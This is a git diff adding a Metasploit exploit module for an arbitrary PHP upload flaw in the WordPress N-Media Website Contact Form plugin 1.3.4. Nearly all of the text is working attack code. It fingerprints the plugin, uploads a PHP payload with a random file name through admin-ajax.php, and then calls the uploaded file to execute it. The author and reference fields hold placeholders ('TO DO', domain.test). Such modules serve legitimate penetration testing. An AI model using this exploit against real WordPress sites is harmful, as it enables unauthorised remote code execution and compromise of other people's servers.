diff --git a/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb b/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb new file mode 100644 index 0000000000..c056a9ba0a --- /dev/null +++ b/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb @@ -0,0 +1,81 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::HTTP::Wordpress + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Wordpress N-Media Website Contact Form Upload Vulnerability', + 'Description' => %q{ + This module exploits an arbitrary PHP code upload in the WordPress N-Media Website Contact Form + plugin, version 1.3.4. The vulnerability allows for arbitrary file upload and remote code execution. + }, + 'Author' => + [ + 'TO DO', # Vulnerability discovery + 'Roberto Soares Espreto ' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['URL', 'http://domain.test'] + ], + 'Privileged' => false, + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => [['N-Media WebSite Contact Form 1.3.4', {}]], + 'DisclosureDate' => 'Mar 14 2015', + 'DefaultTarget' => 0) + ) + end + + def check + res = send_request_cgi( + 'uri' => normalize_uri(wordpress_url_plugins, 'website-contact-form-with-file-upload', 'readme.txt') + ) + + if res && res.code == 200 && res.body =~ /N-Media Website Contact Form/ + return Exploit::CheckCode::Detected + end + + Exploit::CheckCode::Safe + end + + def exploit + php_pagename = rand_text_alpha(4 + rand(4)) + '.php' + + data = Rex::MIME::Message.new + data.add_part('upload', nil, nil, 'form-data; name="action"') + data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{php_pagename}\"") + data.add_part('nm_webcontact_upload_file', nil, nil, 'form-data; name="action"') + post_data = data.to_s + + res = send_request_cgi({ + 'uri' => normalize_uri(wordpress_url_backend, 'admin-ajax.php'), + 'method' => 'POST', + 'ctype' => "multipart/form-data; boundary=#{data.bound}", + 'data' => post_data + }) + + if res && res.code == 200 && res.body =~ /filename/ + new_php_pagename = JSON.parse(res.body)["filename"] + print_good("#{peer} - Our payload is at: #{new_php_pagename}. Calling payload...") + register_files_for_cleanup(new_php_pagename) + else + fail_with("#{peer} - Unable to deploy payload, server returned #{res.code}") + end + + print_status("#{peer} - Calling payload...") + send_request_cgi({ + 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', 'contact_files', new_php_pagename) + }, 2) + end +end